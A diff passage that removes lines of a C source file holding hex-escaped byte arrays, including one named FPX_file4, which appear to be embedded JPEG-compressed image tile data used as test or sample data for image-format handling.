-"\xfc\x24\xf0\xc0\x7a\x83\xfa\x13\xe9\x57\xe9\xb5\xd4\x49\xf4\x19" -"\x2c\x69\x34\x6d\x1c\xa8\xae\x8c\x30\xca\xc3\x20\x8a\xa3\x75\x1a" -"\xcc\xf2\x5a\x95\x9d\x57\x00\xee\x5f\x94\x30\xfe\xe8\x6f\xc3\x9e" -"\xbf\x08\x51\xb0\x08\x04\xe0\xe4\x8e\x4e\x2b\x4a\x99\x34\x31\xce" -"\x9b\x25\x40\xeb\x9c\xe0\xd2\x8c\x14\x5d\xca\x9c\xdc\xa3\x63\x1a" -"\x3d\x54\x6a\x93\xc1\x0c\x56\xb2\xc5\xe5\xca\xac\xcd\x26\x00\xc0" -"\xfc\x79\xad\xf8\xa3\xf3\x1f\xe6\x1f\x28\xea\x08\xeb\x55\x63\xb1" -"\xb5\x13\x2f\x97\x04\x62\x4e\xa3\xfc\x6b\x4d\x14\x22\x05\x5e\x82" 
-"\xb6\x93\x4f\xe1\x47\x3c\x54\x97\xc4\xc6\xcf\x27\x95\x19\x60\xa5" -"\x8f\x40\xa3\xb9\xa8\xae\x23\x58\xec\x2e\x02\x8c\x65\x18\x9f\xae" -"\x2a\x44\xdc\xf3\x17\x0e\x0c\x40\x6d\x00\x7a\xe7\x9c\xd2\x5e\xff" -"\x00\xc7\x8c\xff\x00\xf5\xcd\xbf\x95\x0b\x70\x7b\x0d\xba\xfe\x0f" -"\xbd\xdf\xa7\x4a\x86\xa6\xba\xfe\x0e\x3d\x79\xcd\x43\x50\xcd\x10" -"\x51\x45\x49\x02\x6f\x7d\xc7\xee\xaf\x62\x3b\xd2\x06\xc9\x2d\xd0" -"\xaa\x6e\x60\xc0\xb7\x25\x4e\x38\xf6\xe2\x96\x69\x02\x94\x4c\x31" -"\x32\x1c\x0c\x76\xf7\xa9\x09\x00\x64\xf0\x2a\x38\x84\x85\x9d\x9d" -"\x81\x52\x7e\x40\x3b\x0a\xb2\x18\xe8\xa3\x58\xa2\x58\xe3\x18\x55" -"\x18\x02\x99\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x55\x35\x43" -"\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x54\x2d\xc1\xec\x36\xeb" -"\x19\x4e\x07\x7f\xad\x43\x53\x5d\x11\xb9\x06\x46\x79\xe3\xbd\x43" -"\x52\xca\x42\xa8\x2c\xe1\x46\x32\x7d\x4f\x6a\xb6\xaa\x15\x42\x8e" -"\x82\xab\x41\xfe\xbc\x0c\x8e\x87\x8c\x55\xa2\x40\xeb\x4d\x03\x21" -"\x98\xa4\xaf\xf6\x66\x0c\x77\x2e\x5b\x1d\x85\x4c\x00\x03\x03\x80" -"\x2a\x38\x04\x9e\x58\x33\x63\x79\xe4\x81\xdb\xda\xa5\xa6\xc9\x5d" -"\xc2\xa1\xbd\xff\x00\x8f\x19\xff\x00\xeb\x9b\x7f\x2a\x96\x9b\x2a" -"\x09\x62\x78\xd8\x90\x1d\x4a\x9c\x7b\xd0\x81\xec\x00\xff\xd9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" -"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" -"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xd7\x86" -"\xf5\xe4\x99\x51\xe1\xd8\x09\x2b\x9c\xe7\x91\xf8\x74\xad\x9d\x18" -"\xe3\x53\xce\x40\x3e\x53\x73\x8e\x7b\x53\x22\xd3\xee\x64\x82\x29" -"\xbf\x74\x04\xaa\x0a\xe5\xfa\xe7\xb7\x4a\xd0\xd3\x74\xc9\xed\xae" -"\x1e\x79\x98\x0c\x21\x50\xa8\x73\x9f\x7a\xf1\x70\xd8\x5a\xb0\xac" -"\xa4\xe3\x64\x8f\x42\xb5\x78\x4a\x9b\x49\xdc\xb4\x39\x03\xbd\x15" -"\xfc\xd6\x8d\x47\x70\xae\xf6\xee\x22\xdb\xe6\x6d\x3b\x37\xf4\xcf" -"\x6c\xd2\x02\x87\x86\xbf\xe4\x5b\xd3\xff\x00\xeb\x82\xff\x00\x2a" 
-"\xd3\xac\xcf\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe\x55\xa7\x57" -"\x53\xe2\x64\xd3\xf8\x10\x51\x45\x15\x05\x85\x53\xb5\xbb\x69\x2f" -"\x6e\x6d\x27\x55\x49\x62\x21\x93\x1d\x1e\x33\xd1\xbf\x3c\x83\xf4" -"\xf7\xab\x95\x0c\xb1\xc2\xb2\x0b\xa7\x41\xbe\x24\x60\x1f\x19\x21" -"\x4e\x09\x1f\xa0\xa6\xac\x27\x72\x6a\x29\x90\xcb\x1c\xf0\xa4\xd0" -"\xb0\x78\xdd\x43\x2b\x0e\x84\x1a\x7d\x21\x99\x9e\x1a\xff\x00\x91" -"\x6f\x4f\xff\x00\xae\x0b\xfc\xab\x4e\xb3\x3c\x35\xff\x00\x22\xde" -"\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x5d\x4f\x89\x91\x4f\xe0\x41\x45" -"\x14\x54\x16\x14\x51\x45\x00\x54\xd3\xec\xcd\x90\x9a\x25\x70\x60" -"\x69\x0b\xc4\x98\xfb\x80\xf2\x57\xe9\x9c\x91\xf5\xab\x75\x5b\x50" -"\x86\x69\xad\x18\x5a\xca\x63\x9d\x48\x78\xce\x70\x09\x1c\xe0\xfb" -"\x1e\x87\xeb\x4e\xb3\xb8\xfb\x55\xa4\x53\xf9\x6f\x19\x75\xc9\x47" -"\x18\x2a\x7b\x83\x54\xf5\xd4\x95\x65\xee\x95\xf4\x18\x64\xb7\xd0" -"\xac\xa1\x9d\x0a\x48\x90\xaa\xb2\x9e\xa0\xe2\xaf\xd1\x49\x91\x90" -"\x32\x32\x7a\x0a\x4d\xdd\xdc\x71\x56\x56\x16\x8a\x28\xa4\x30\xa2" -"\x8a\x28\x00\xaa\xb3\xdd\x34\x17\xb6\xf0\xb4\x44\xc5\x3e\xe5\xf3" -"\x07\xf0\xb8\x19\x00\x8f\x71\x9e\x7d\xbd\xea\xd5\x14\xd0\x98\xff" -"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff" -"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03" -"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00" -"\xe9\xec\xe7\x9e\x13\x01\x8e\x62\xc2\x47\x55\x58\x23\x5f\x92\x33" -"\x9c\x34\x64\x63\xe5\x20\x64\x86\x3d\x70\x73\x5d\x05\x43\x72\xcb" -"\x65\x6f\x35\xd3\xc4\xbe\x62\xa6\xe7\xda\x39\x6c\x0e\x99\xa8\x56" -"\x5b\xb8\x67\x85\x2e\xcc\x2e\xb3\x9d\xa3\xca\x52\xbb\x1b\x04\xe3" -"\x92\x72\x38\x3c\xf1\x57\x27\xcf\xa9\x10\x5c\x9a\x32\xe5\x14\x51" -"\x59\x1b\x05\x14\x51\x40\x05\x14\x55\x2b\xfb\xc4\x58\x64\x8e\x0b" -"\x85\x12\xa1\x5f\x37\x61\x05\xe3\x42\x46\xe6\xc7\xb0\xa6\x93\x6e" -"\xc8\x99\x49\x45\x5d\x9a\x37\x36\xe8\x5d\xee\x1e\x46\xda\x23\x2a" 
-"\xc8\xc7\xe4\xc7\x5c\xe3\xd6\xb2\xa6\xb7\x0b\x6a\x50\x5e\x7d\x9b" -"\x4f\x0b\xb8\xba\xc9\xf3\x10\x7b\x06\x3f\x75\x7a\x74\xfd\x2b\x78" -"\xf2\x30\x6a\x85\xdc\x08\x59\x6d\xd6\x16\x48\xf6\x65\x1d\x54\x6d" -"\x8c\x8e\x98\xf4\x3c\xf1\xc5\x5a\x76\x21\xab\x95\x74\xdb\x9f\x36" -"\x33\x14\x92\x66\x55\xcb\x28\x61\xb5\xcc\x79\xc2\xb1\x5e\xd9\xab" -"\x95\x8d\xb1\x1a\xf1\x2d\xf4\xf4\x58\xae\x22\x32\x3c\x8f\x22\xee" -"\x62\xc3\x00\x16\x63\xce\x1b\x27\x9e\xb5\xb2\x7f\x2c\xf4\xa5\x34" -"\x93\xba\x0a\x6d\xb5\x66\x14\x51\x54\x2e\xb5\x03\x05\xd9\x8d\x43" -"\x49\x18\x5f\xde\xb2\x46\x4f\x90\x7a\x86\x27\xa6\x3d\xba\x8e\xb5" -"\x2a\x2e\x5b\x17\x29\x28\xab\xb1\xda\x95\xd9\x82\x10\x21\x7c\x1d" -"\xea\x24\x75\xc3\x18\x54\x9e\x58\x8f\xf3\x8a\x8a\x2b\x16\x29\xf6" -"\x79\x8b\x3e\xc6\x33\x43\x77\x1e\x15\x81\x27\x3c\xfb\xf3\xf4\x22" -"\xa0\xb4\xb7\xdf\x1d\x9a\xad\x99\x49\xa2\x60\xcf\x73\xc6\xd7\x18" -"\xf9\x88\x6c\xe5\xb7\x7a\x7b\xf3\xd2\xb5\xed\xd2\x14\x75\xb4\x87" -"\x62\x6c\x5c\x88\xc1\xfb\xab\x9f\x4f\x4a\xd1\xfb\xaa\xc8\xc9\x7b" -"\xee\xec\xd0\xa4\x61\x95\x23\xd6\x96\x8a\x83\x43\x2e\x58\x6e\x92" -"\x38\xdd\x88\x7b\x84\x52\x36\x2b\x15\x89\xc9\xee\x7f\x9d\x65\x42" -"\x86\x7d\x41\x2e\xfc\x89\x2f\x54\x1c\x34\xe7\x0a\xaa\x41\xe0\xc4" -"\xa7\x9c\x0e\xe7\xb8\xf5\xae\x86\xea\x28\xcb\x24\xf2\x48\xc9\xe5" -"\x03\x8f\x9b\x0a\x73\xeb\xeb\xda\xa1\xaa\x52\xe5\x25\xc3\x98\x2a" -"\x93\xdb\x5d\x24\xb3\xfd\x96\x58\x84\x73\x9d\xcd\xe6\x29\x25\x0e" -"\x00\x24\x63\xaf\x4e\x86\xae\xd0\x08\xc8\x0c\xc1\x72\x40\x04\x9c" -"\x73\x50\x9b\x45\xc9\x27\xb9\x04\x56\xe6\xd2\xc9\x20\xb1\xb7\xde" -"\x23\x01\x55\x37\x05\xe3\x3c\x9c\xfe\x66\xb4\x92\x34\x43\xb9\x54" -"\x06\xc6\x0b\x63\x92\x29\x96\xd0\x18\x23\x2a\x65\x79\x49\x62\xdb" -"\x9f\xb6\x4f\x41\xec\x2a\x6a\xa2\x50\x51\x45\x14\x86\x57\xbe\xfb" -"\x39\xb4\x7f\xb5\xec\xf2\xb8\xce\xfe\x99\xcf\x1f\xae\x2a\x23\xd6" -"\xa6\xbd\x92\x28\xad\x5d\xee\x00\x31\xf0\x0e\x57\x77\x24\xe0\x71" -"\xf5\xc5\x42\x7a\xd0\xc6\xb7\x12\x9a\xed\x02\xb4\x7f\x68\xdb\xb4" 
-"\xc8\xa1\x77\x0f\xe2\xcf\xcb\xf8\xe7\x14\xea\x46\x92\x38\x9a\x36" -"\x94\x12\x0b\xaa\x8f\x97\x3c\x93\x81\xfa\xf7\xa4\xb7\x07\xb1\x7e" -"\x8a\x28\xa6\x20\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0b\x5c\xc6\x8e\x11\xc9\x07\x81\x92\x3b\xfa\x7d\x6a\x6a\xf6\x6c" -"\x70\xa7\x70\xac\xb8\xf5\x2b\xad\x8b\xe6\x5a\xe7\xfb\xc4\x13\xed" -"\xdb\x1e\xf5\xa9\x45\x20\x0a\x28\xa2\x81\x8b\xa7\xc6\xb2\x68\xf6" -"\x8a\xe0\x11\xe5\x21\xfc\x70\x2a\xcc\x32\x34\x91\xe5\xd0\xa3\x02" -"\x41\x06\xa1\xd2\xff\x00\xe4\x15\x69\xff\x00\x5c\x53\xf9\x0a\x92" -"\x4c\xc7\x28\x99\xa4\x0b\x18\x18\x60\x7a\x7b\x1a\xd2\x5b\xb3\x18" -"\xec\x8a\x1a\x8d\x9e\x1c\x49\x1a\x8d\xc3\xa7\x27\x27\x8a\x2d\x27" -"\xf3\x53\x6b\x70\xeb\xc1\xf7\xf7\xad\x37\x50\xe8\x54\x92\x33\xdc" -"\x56\x2d\xd4\x73\x5b\x5d\xf9\x91\xc6\xcd\xb8\x8c\xa8\x6c\x9c\x73" -"\xdb\xde\x8d\xd5\x87\xf0\xbb\x97\xa8\xa6\xc4\xe2\x48\x95\xc1\xce" -"\x47\x5c\x62\x9d\x59\x9a\x05\x14\x51\x40\xc9\x34\xbf\xf9\x05\x5a" -"\x7f\xd7\x14\xfe\x42\xac\x3a\x2c\x91\xb2\x38\x0c\xac\x08\x20\xf7" -"\x15\x5f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x69\x2d" -"\xd9\x94\x7e\x14\x45\x13\x92\xcf\x19\x52\xa5\x0e\x06\x79\xc8\xf5" -"\xa6\xdc\xc2\x24\x8c\xf1\x9e\x39\x18\xe5\x87\xa5\x3a\x60\xf9\x47" -"\x47\x0a\x14\xe5\x81\xe8\x45\x48\x08\x60\x0a\x9c\x83\xd0\x8a\x43" -"\x31\xad\x97\xec\x5f\xba\x91\xdd\xf3\x8e\xdc\x2f\x6a\xb9\x49\x7f" -"\x6a\xac\xa5\x95\x47\x3e\xe7\x93\xfe\x15\x5e\xc6\x56\x31\x14\x93" -"\x07\x67\x1b\x87\x43\x43\xd7\x50\x8b\xb6\x85\x9a\x8e\x79\x92\x08" -"\x9a\x47\xe8\x06\x71\xdc\xd1\x3c\xc9\x02\x6f\x7e\x99\xc5\x54\x85" -"\x0d\xe4\xc6\x49\x71\xb0\xe0\x28\xc9\xfc\xa9\x25\xd5\x8e\x52\xb6" -"\x8b\x73\x4f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x45" -"\x6f\x12\xdb\xdb\x47\x0a\x92\x56\x35\x0a\x09\xf6\xe2\xa5\xa6\xdd" -"\xd8\x92\xb2\x12\xa1\x84\xac\x52\x7d\x99\x54\xa8\x0b\xb9\x4f\x62" -"\x2a\x7a\x64\x8a\xcc\x06\xd6\xda\x41\x07\x38\xfd\x28\x06\x38\x8c" 
-"\x82\x2b\x2e\xe6\xc8\x34\xc3\xe7\x2a\xaa\x77\x63\x39\xcf\xbd\x6a" -"\xd5\x49\xc8\xf3\xc8\xca\xe7\x68\xe9\xd7\xbd\x2b\xd8\x76\xbe\xe4" -"\x32\xc4\xb2\x80\x18\x91\x8e\x84\x1c\x55\x9b\x68\x04\x68\x32\x31" -"\xc0\x01\x7f\xbb\x50\x31\x01\x72\x4a\x80\x3b\xb7\x4a\xbf\x42\x07" -"\xb8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" -"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" -"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" -"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" -"\x03\x11\x00\x3f\x00\xed\xaf\xaf\x9a\x38\xf6\x61\xa2\x60\xc0\xcc" -"\x54\x82\xd1\x47\x9c\x6f\xf7\x1c\x75\xed\x4d\x1a\x74\x8d\x7c\x27" -"\xfb\x44\x84\x88\xf1\x1d\xca\x95\x2d\xb4\xff\x00\x09\x04\x10\x7d" -"\x98\x7f\xfa\xe1\x86\xde\x27\xd4\x55\x2c\xae\x0c\xd0\xa0\x32\x34" -"\x9e\x66\xe3\x13\x93\xd0\x1e\x84\x37\x39\x53\xc7\x7a\xd7\x86\x24" -"\x28\xd6\xd6\xac\x91\x79\x6b\x80\xab\x83\xe5\xe7\xa7\x15\xa3\x7c" -"\xba\x44\xc9\x2e\x67\x79\x0d\xb7\x84\x41\xe4\x5b\x43\x0b\x98\xb9" -"\x05\xc1\x1f\x2f\x7c\x9c\xf5\x24\xd5\xe8\xa1\x8e\x10\xc2\x28\xd5" -"\x37\x31\x66\xda\x31\x92\x7a\x93\xef\x4b\x0a\x18\xe1\x44\x2e\x5c" -"\xa8\x00\xb1\xea\xc7\xd6\x9f\x59\x9a\x05\x14\x53\x25\x96\x38\x62" -"\x79\x65\x70\x91\xa0\x2c\xcc\xc7\x00\x01\xde\x81\x91\xde\x5d\x45" -"\x65\x6c\xd7\x13\x92\x11\x7b\x01\x92\xc4\xf4\x00\x77\x24\xd3\x91" -"\x56\x41\x1c\xcf\x08\x59\x02\xf1\xb8\x02\xc9\x9c\x64\x67\xfc\xf4" -"\xa8\xda\xde\xde\xee\x5b\x7b\xb6\xcb\xf9\x63\x74\x59\x27\x03\x23" -"\xef\x63\xd7\x1f\x96\x4d\x59\xa7\xa1\x2a\xed\x99\xfb\x59\x3c\xb4" -; - -unsigned char FPX_file4[] = -"\x82\x0d\xc0\xb8\x0d\xb7\x0a\x10\x1e\xad\x57\x52\x28\xe3\x66\x64" -"\x45\x56\x6c\x6e\x20\x72\xdf\x5f\x5a\x6d\xb4\x26\x0b\x75\x8d\xa5" -"\x79\x58\x75\x77\xc6\x4f\xe5\x52\xd2\x28\x28\xa2\x8a\x00\x2a\x9d" -"\xdd\x92\xdf\x49\x01\x96\x4d\xd6\xf1\x9d\xe6\x20\x38\x91\xbf\x84" 
-"\x93\xdc\x0e\xb8\xf5\xc7\xa5\x37\x51\xb6\x9e\xf5\xa3\xb6\x0c\x23" -"\xb4\x6c\x99\xc8\x38\x67\x1f\xdc\x1e\x80\xf7\x3e\x9c\x77\xab\x8a" -"\xaa\x8a\x15\x00\x55\x51\x80\x07\x40\x2a\xb6\xd5\x13\xf1\x68\xc7" -"\x51\x45\x15\x25\x05\x14\x51\x40\x05\x50\xd4\x9a\xea\x56\x4b\x3b" -"\x30\xf1\x99\x41\x32\x5c\x01\xc4\x4b\xdf\x1f\xed\x1e\xdf\x9f\x6a" -"\x5d\x46\xf1\xe1\x64\xb5\xb3\x55\x92\xf2\x6f\xb8\xad\xd1\x07\x77" -"\x6f\x61\xfa\x9c\x0a\xba\xb9\x0a\x01\x39\x3d\xcd\x52\xf7\x75\x25" -"\xfb\xda\x08\x8b\xb1\x15\x72\x4e\x06\x32\x4e\x49\xa7\x51\x45\x49" -"\x41\x48\x48\x00\x92\x70\x07\x7a\x5a\xc3\xf1\x6d\xdc\x90\xe9\x42" -"\xd2\xdb\xfe\x3e\x6f\x9c\x5b\xc6\x3e\xbd\x4f\xe5\xfc\xea\xa1\x1e" -"\x69\x24\x4c\xe5\xcb\x16\xcd\xca\xab\x7f\x7a\xb6\x51\x29\xd8\x65" -"\x9a\x46\xd9\x14\x4b\xd5\xdb\xd3\xd8\x77\x27\xb0\xab\x55\x00\xb5" -"\x8b\xed\xa6\xed\x81\x69\x76\xec\x52\xdf\xc0\x3b\x81\xf5\xc5\x25" -"\x6e\xa3\x77\xb6\x84\xa0\x7f\x11\x50\x1b\x18\x34\xea\x28\xa4\x30" -"\xa2\x91\x59\x5b\x3b\x48\x38\x38\x38\x3d\x0d\x19\x00\x81\x9e\x4d" -"\x00\x2d\x73\xd6\xd1\xbe\xa7\xe3\x09\xee\xe4\x56\x16\xfa\x72\xf9" -"\x30\x86\x1c\x19\x08\xf9\x8f\xe5\xfd\x2b\xa1\xa4\xdc\x37\x6d\xc8" -"\xdd\x8c\xe3\xbd\x54\x65\xcb\x72\x25\x1e\x6b\x00\xff\xd9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" -"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" -"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa1" -"\xad\xea\x0b\xa5\xe9\x17\x17\x87\x1b\x91\x7e\x40\x7b\xb1\xe0\x0f" -"\xce\xaf\xd7\x39\xab\x7f\xc4\xdb\xc5\x16\x7a\x58\xe6\x0b\x41\xf6" -"\xab\x8f\x42\x7f\x85\x7f\xcf\x63\x5a\x53\x8a\x72\xd7\x63\x3a\x92" -"\x6a\x3a\x6e\xcb\xde\x1a\xd3\xdb\x4e\xd1\xa2\x49\x7f\xe3\xe2\x5f" -"\xde\xcc\x4f\x52\xed\xc9\xcf\xd3\xa7\xe1\x5a\xb4\x51\x53\x29\x39" -"\x3b\xb2\xa3\x15\x14\x92\x0a\x28\xa2\xa4\xa3\x9c\x8f\xfe\x25\x1e" -"\x33\x74\xfb\xb6\xda\xaa\xee\x5f\x41\x2a\xf5\xfc\xc7\xea\x6b\xa3" 
-"\xac\x6f\x15\xd9\x3d\xde\x8c\xd2\xdb\xf1\x73\x68\xc2\xe2\x12\x3a" -"\xe5\x79\xfe\x59\xfd\x2a\xfe\x97\x7a\x9a\x8e\x9b\x6f\x79\x1f\x02" -"\x54\x0d\x8f\x43\xdc\x7e\x06\xb5\x9f\xbd\x15\x2f\x91\x8c\x3d\xd9" -"\x38\xfc\xc9\x6e\xae\x23\xb5\xb5\x96\xe2\x53\x84\x89\x0b\xb1\xf6" -"\x02\xb1\xbc\x23\x6f\x23\x59\xcd\xaa\x5c\x8c\x5c\x6a\x12\x19\x4f" -"\xb2\x7f\x08\xfc\xbf\x9d\x33\xc5\x2e\xd7\xb3\x59\xe8\x70\x92\x0d" -"\xe3\xee\x98\x8f\xe1\x89\x79\x3f\x9f\xf4\xad\xf8\xd1\x63\x8d\x63" -"\x8d\x42\xa2\x80\x14\x0e\xc2\x8f\x86\x1e\xbf\x90\x7c\x55\x3d\x3f" -"\x31\xd4\x51\x45\x64\x6c\x14\x51\x45\x00\x21\xe4\x60\xd7\x3d\xe1" -"\xff\x00\xf8\x96\x6b\x57\xfa\x21\xe2\x3c\xfd\xa6\xdb\xfd\xc6\xea" -"\x07\xd0\xd7\x45\x5c\xf7\x8a\xd1\xac\xda\xd3\x5b\x84\x12\xf6\x52" -"\x62\x40\x3f\x8a\x36\xe0\x8f\xf3\xeb\x5a\xd3\xd6\xf0\xef\xf9\x99" -"\x55\xd2\xd3\xed\xf9\x75\x1b\xe1\xa0\x75\x2d\x4a\xff\x00\x5d\x71" -"\xf2\xca\xde\x45\xb6\x7b\x46\xbd\xff\x00\x13\xfc\x8d\x74\x75\x5e" -"\xc2\xd2\x3b\x0b\x08\x6d\x21\x1f\x24\x48\x14\x7b\xfb\xd5\x8a\x9a" -"\x92\xe6\x95\xd6\xc5\x53\x8f\x2c\x6c\xf7\x0a\x28\xa2\xa0\xb0\xa2" -"\x8a\x28\x00\xa8\xae\x60\x8e\xea\xd6\x5b\x79\x97\x74\x72\xa9\x46" -"\x1e\xc6\xa5\xa2\x80\xdc\x28\xa2\x8a\x00\x28\xa2\x8a\x00\x28\xa2" -"\x8a\x00\x28\xa2\x8a\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03" -"\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00" -"\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xaf\x7b\x67\x0d\xec\x1e\x54" -"\xc0\xf0\x77\x2b\xa9\xc3\x23\x76\x2a\x7b\x1a\xb1\x45\x34\xed\xb0" -"\x9a\xbe\x8c\x82\xd5\x66\x8a\xd9\x12\xee\x64\x96\x50\x71\xe6\x05" -"\xdb\xbb\x9e\x38\xf5\xa9\xea\x1b\xbb\x58\x6f\x2d\xda\x0b\x84\xdc" -"\x8d\xf8\x10\x7b\x10\x7b\x11\xeb\x51\xd8\x45\x75\x0c\x2d\x15\xdc" -"\xcb\x3e\xd6\xc4\x72\x63\x0c\xcb\xdb\x77\x6c\xfb\x8e\xb4\x6e\xae" -"\x2d\x9d\x8b\x54\x51\x45\x22\x8a\xcf\x6c\x44\xb2\x4a\x25\x76\x0f" 
-"\x83\xb0\xe3\x0b\x8f\x4f\xad\x57\x86\x58\xe7\x85\x65\x89\xb7\x23" -"\x8c\x83\x8c\x7f\x3a\xd1\xa8\x2e\xa2\x92\x44\x5f\x21\xd1\x1c\x30" -"\x24\xb2\xe4\x11\xdc\x7e\x54\x6e\x17\xb1\x3d\x14\xd8\xdd\x64\x8d" -"\x64\x8d\x83\x23\x00\x54\x8e\xe2\x9d\x40\x05\x32\x68\x92\x78\x5e" -"\x29\x54\x32\x3a\x95\x65\x3d\xc1\xa7\xd1\x40\x14\xac\x21\xba\xb5" -"\x67\x82\x69\x3c\xe8\x17\x06\x29\x18\xe5\xf1\xfd\xd6\xf5\xc7\xaf" -"\xf9\x37\x68\xac\xfb\x38\x2e\xac\xae\x7e\xce\x18\xcf\x64\xc0\x94" -"\x67\x6c\xbc\x47\xfb\xa7\x3f\x79\x7d\x0f\x51\xd2\xab\xe2\xd4\x9f" -"\x87\x43\x42\x8a\x28\xa9\x28\xc0\xf0\x8c\xf2\x2d\x9c\xda\x55\xcb" -"\x66\xe3\x4f\x90\xc4\x7d\xd3\xf8\x4f\xe5\xfc\xab\x7e\xb9\xcd\x5b" -"\xfe\x25\x3e\x28\xb3\xd5\x07\x10\x5d\x8f\xb2\xdc\x7a\x03\xfc\x2d" -"\xfe\x7b\x0a\xe8\xeb\x5a\xba\xbe\x65\xd4\xca\x96\x8b\x95\xf4\xfe" -"\x90\x51\x45\x15\x91\xa8\x51\x45\x14\x01\x9f\xb6\xf2\xd7\x50\xdc" -"\x9b\xee\x6d\x27\x6f\x99\x4b\x0d\xd0\x1f\x51\x9e\xab\xed\xd4\x76" -"\xe3\x81\xa1\x45\x67\xde\x35\xe5\xad\xd0\xb9\x84\x3d\xcd\xbb\x60" -"\x49\x00\x03\x72\x7f\xb4\xbe\xbe\xe3\xf2\xf4\x35\xf1\x13\xf0\x8b" -"\xae\x69\xcb\xaa\x68\xf7\x16\x67\x1b\x9d\x72\x84\xf6\x61\xc8\x3f" -"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" -"\x3f\x00\xf4\x72\x70\x33\xd6\xb2\x8e\xaf\x20\xcf\xfa\x36\x78\xec" -"\xc7\xd0\x9c\x1e\x3a\xf1\x5a\xb4\x54\x94\x53\xb3\xbd\x6b\x99\x8a" -"\x18\x8a\x8c\x67\xbe\x47\xd6\xaf\x47\xfe\xb5\x3a\xf5\xed\x50\x5c" -"\x5c\x25\xb8\x05\xc1\x3b\xba\x60\x54\xf0\x90\xd2\x21\x5c\x91\xd7" -"\x83\x4e\xc2\xbf\x42\x97\x88\xb3\x8b\x7e\xb8\xc9\xfa\x57\x31\x2e" -"\xa0\x52\xe0\xc4\x23\x1d\x48\xc9\x3d\x3a\x72\x7d\xb9\xae\xc3\x56" -"\xb1\x7b\xc8\xd0\xc4\x54\x3a\x12\x70\xdd\xeb\x27\xfb\x1a\xe5\x5c" -"\x9d\xb0\x06\x3c\x93\xbb\x9c\x7e\x55\xe4\xe2\xf0\xd5\x2a\x55\xe6" -"\x51\xba\xb1\xdb\x42\xb4\x63\x0b\x37\x63\x14\x6a\x2c\x53\x22\xdd" -"\xc9\x1f\x79\x47\x50\x38\xe7\xf5\xad\x9d\x18\x9f\xed\x48\x0b\x00" -"\x18\xab\x71\xf8\x53\x86\x93\x76\x7a\x79\x24\xf4\xfb\xfd\xea\xdd" 
-"\x86\x93\x3c\x57\x7e\x6d\xc3\x05\x45\x04\x00\x8c\x72\x73\xef\xda" -"\xb3\xc3\xe1\x6a\xc2\xac\x64\xe3\x64\xbc\xcb\xab\x5a\x12\x83\x5c" -"\xd7\x2e\x53\x26\x99\x21\x4d\xd2\x36\x07\xf3\xa2\x69\x52\x14\xdd" -"\x21\xc0\xaa\x6d\x0c\xd3\xdd\xa9\x3b\x9e\x36\x07\x1b\x4f\x04\x76" -"\xc5\x7b\x71\x57\xdc\xf3\xa5\x2b\x6c\x49\x08\x92\xe4\xbb\x31\x0c" -"\x87\x80\xa0\x75\xc1\xeb\xcd\x6a\x43\x08\x8c\x76\x2d\xeb\x8e\xde" -"\x94\x43\x08\x8c\x64\xf2\xdd\xb8\xe9\xed\x4e\x96\x54\x86\x26\x92" -"\x43\xb5\x57\xa9\xa7\xb8\xb6\x12\x69\x3c\xa8\x8b\x85\x2e\x47\x45" -"\x1d\x4d\x67\x6a\x6b\xbc\xc7\x6c\x80\x89\xae\xc8\x57\x39\xce\xd4" -"\x1c\xb7\xf8\x7e\x35\xa0\x88\x7c\xd6\x95\x99\x8e\xe0\x00\x53\xc6" -"\xd1\xfe\x35\x4a\xc3\xfd\x2a\xfe\xe2\xf8\xf2\x80\xf9\x31\x7d\x01" -"\xf9\x8f\xe7\xfc\xaa\xa3\xa6\xa4\x4b\x5d\x06\xf9\x49\x6b\xac\xaa" -"\x95\x1e\x4d\xc8\x05\x7f\xd9\x91\x47\xf5\x1f\xca\xaf\x46\xee\xb9" -"\x59\xca\x02\x5b\x0a\x41\xfb\xd5\x0e\xab\x6e\xf3\xd9\x37\x93\xfe" 